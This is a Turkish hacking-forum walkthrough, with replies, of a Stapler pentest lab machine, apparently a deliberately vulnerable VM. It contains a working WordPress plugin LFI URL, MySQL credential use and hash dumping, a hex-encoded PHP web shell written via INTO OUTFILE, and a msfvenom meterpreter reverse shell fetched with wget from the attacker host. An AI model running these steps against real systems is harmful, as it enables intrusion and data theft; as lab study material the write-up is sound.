Pentest Challange: Stapler (Part 2)

Belvando

Üye
3 Haz 2017
249
15
Mantı V2
Kaldığımız yerden devam ediyoruz.
Part 1:
http://www.turkhackteam.org/siber-guvenlik/1524290-pentest-challange-stapler-part-1-a.html


Ve bunlar olurken ben bir sıkıntı ile karşılaşıp hedef cihazın ip adresini değiştirmek zorunda kaldım.
Wpscan programına herhangi bir eklenti eklemediğimiz sürece bize lazım olucak açığı vermeyecektir.
Eklentimizi --enumerate ap parametresi ile ekliyoruz.
wpscan -u https://192.168.43.149:12380/blogblog --enumerate ap



Evet karşımıza 4 tane plugin sonucu çıktı.
Bu pluginlerden "embed video" olan seçeneğini kullanıcaz.
Açığı sömürebilmemiz için doğru exploiti arıcaz.

searchsploit advanced video



Evet karşımıza kullanabileceğimiz bir tane exploit çıkardı.
Bize gösterdiği yeri açıp exploitimizin nasıl kullanıldığını öğreniyoruz.




Exploitten anladığımız kadarıyla LFI denicez.
LFI deki mantık gayet basittir.
Urldeki yönlendirmeyi linux klasör sistemine göre çeviriceksiniz.
1&thumb= kısmından sonraki yere ../ koyarsanız bir üst dizine çıkarsınız.
Bunu nekadar tekrarlar iseniz root dizinine ulaşmanız bi okadar hızlı olur.
Bende bunu kullanarak /etc/passwd kısmına yöneldim.
(Ki benbunları söylerken ben ../ ı az kullandığımdan istediğim yere gelemedim, ancak bunu yaparkende yapmam gerekenide yapmış oldum.)
https://192.168.43.149:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../../../../../etc/passwd



Ve her F5 tuşuna bastığımda sayfadaki değerin arttığını gördüm.
Amacım sayfaya girebilmekti ancak sayfaya girmeye çalışırken 404 hatası alıyordum.

Ama anamenüye dönünce karşımda daha önce orada olmayan sayfaların açıldığını fark ettim.



Uzun denemeler sonucunda ne yapmam gerektiğini kavradım.
Yeni açılan adı "RANDOM" olan sayfaların üzerindeki .jpeg dosyasını indirmeyi düşündüm.

Ama dosya açılmayıp başka sayfaya aktarıyordu.
Bir arkadaşıma sordum sıkıntımı ve akla sığmıcak bir cevap verdi.


-Kaptan şimdi benim böyle böyle sıkıntım var ve resimi indirmek istiyorum sence ne yapalım?
+ CURL DENE
(Tabi bukadar kısa olmadı konuşma :) )


Denediğimde sevindiren bir sonuçla ekrana baktım.



Ne güzel.
Burda verilen bilgiler MySQL bilgileri olduğu zaten anlatılmış.
Bizde bu bilgileri kullanarak mysql kısmına giricez.

mysql -h 192.168.43.149 -u root -p



Anlaşılan oki karşı tarafın database kısmına eriştik.
Bunu kullanabilmemiz içinde şifrelerin kayıtlı tutuldüğü kısma geçmemiz lazım.

(Burada fotoğraf koyabilirdim ancak çok fazla fotoğraf olucağından artık daha tasarruflu olmamız gerekmekte.)
Sırasıyla kodlarımı giriyorum.
show databases;
use wordpress
show tables;
select * from wp_users;




Evet sizinde çok az gördüğünüz üzere hedefin databaseinde bulunan kişilerin ismi ve şifre hashleriyle aldık.
(Sözüm web hackerlarına: Sanki bu tema size bir yerden tanıdık geliyor demi? :) )
Ama bunları kırmamız lazım.
Bu işi güzel bir wordlist ile jhon abimize verebiliriz.


Kendimize bir + verelim.
1 - 256 oranla kaybediyoruz.
Ama yılmadan devam etmemiz lazım.


Gel zaman git zaman şifrelerin hepsi kırılır ve hiç bir işe yaramadan çöpe atılır.

Belli başlı boş denemeleri yapmaya yeniden döndük.
Ve Google amacamıza muhtaç kaldık ve benim için yeni olan bir shell upload taktiği öğrendim.
İsterseniz gelin beraber görelim.


select 0x3c3f2053797374656d28285b27636d64275d293b203f3e into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";



Böyle güzel bir haraket yaparak hedefte bir shell dosyasını upload edebilirsiniz.
Bu shell dosyasının içinden komut vererek bizdeki php RAT dosyasını almasını istiyeceğiz.

Php RAT dosyasını msfvenom aracı ile yapabiliriz.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.200 lport=25642 R > /var/www/html/final.php



RAT dosyamızda sıkıntısız bir biçimde oluşturuldu.
Şimdi ise son hamlalere doğru php RAT dosyasını upload edip çalıştırıcaz.

https://192.168.43.149:12380/blogblog/wp-content/uploads/shell.php?cmd= wget 192.168.43.200/final.php

Upload başarılı oldu ve uploads kısmına gidip final.php dosyamızı çalıştırdığımızda meterpreter sezonumuz açılıyor :D



:yaho1 Sonunda girebildik :yaho1

Benim için yeterince zor oldu.(5 saat)
Umarım zisin için okuması kolay olmuştur.
Bu seferki için part halinde yapmak zorunda kaldım umarım afedersiniz.


Eğer bunun gibi challangeların paylaşımını istiyorsanız teşekkür etmeyi unutmayın.
Elimde bir sürü challange var.
Eğer bir hatam olursa afola.
Birseferki konuda görüşmek dileğiyle.


:RpS_thumbsup:HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.:RpS_thumbsup:
 
Son düzenleme:

b0mb

Katılımcı Üye
14 Mar 2017
471
1
İzmir
Databasede bulunan kullanıcların şifrelenmiş parolalarından birini kendi oluşturduğun bir hash ile değiştirseydin bu kadar uğraşmana gerek kalmazdı. Ellerine sağlık güzel bir konu olmuş. :)
 

Belvando

Üye
3 Haz 2017
249
15
Mantı V2
Databasede bulunan kullanıcların şifrelenmiş parolalarından birini kendi oluşturduğun bir hash ile değiştirseydin bu kadar uğraşmana gerek kalmazdı. Ellerine sağlık güzel bir konu olmuş. :)

Evet gayet mantıklı ancak oradaki değişiklik sadece wordpress sayfasına girmeme yarardı.
Bizim amacımız karşı tarafa sızabilmek.
Ve ben o parolaları bulduktan sonra ssh a bağlantıda kullanmayı denedim ve sonuç olumsuz.
BÖyle birşey olacağı belliydi zaten. :D
 

b0mb

Katılımcı Üye
14 Mar 2017
471
1
İzmir
Evet gayet mantıklı ancak oradaki değişiklik sadece wordpress sayfasına girmeme yarardı.
Bizim amacımız karşı tarafa sızabilmek.
Ve ben o parolaları bulduktan sonra ssh a bağlantıda kullanmayı denedim ve sonuç olumsuz.
BÖyle birşey olacağı belliydi zaten. :D

Sayfaya girip weevely ile backdoor atardım ben, o yüzden dedim :)
 

Belvando

Üye
3 Haz 2017
249
15
Mantı V2
Sayfaya girip weevely ile backdoor atardım ben, o yüzden dedim :)

Evet aklıma geldi ancak ben ubuntu kullanıyorum ve weevely kurmadığımdan yapmadım.
Ama sizsinde üretebileceğiniz bir sürü yöntem var.
Weevely sadece bir yöntem başka da olur.
Örnek vermek gerekirse direk mysql üzerinden updates kısmına msfvenom dan oluşturulmuş php ratınıda cryptleyip atabilirdim.
 

b0mb

Katılımcı Üye
14 Mar 2017
471
1
İzmir
Evet aklıma geldi ancak ben ubuntu kullanıyorum ve weevely kurmadığımdan yapmadım.
Ama sizsinde üretebileceğiniz bir sürü yöntem var.
Weevely sadece bir yöntem başka da olur.
Örnek vermek gerekirse direk mysql üzerinden updates kısmına msfvenom dan oluşturulmuş php ratınıda cryptleyip atabilirdim.

Güzel bir labmış bu, indirip uğraşayım biraz. Eline sağlık tekrardan :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.